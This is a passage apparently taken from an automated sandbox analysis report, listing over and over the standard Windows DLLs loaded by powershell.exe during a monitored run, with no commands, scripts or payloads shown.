                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
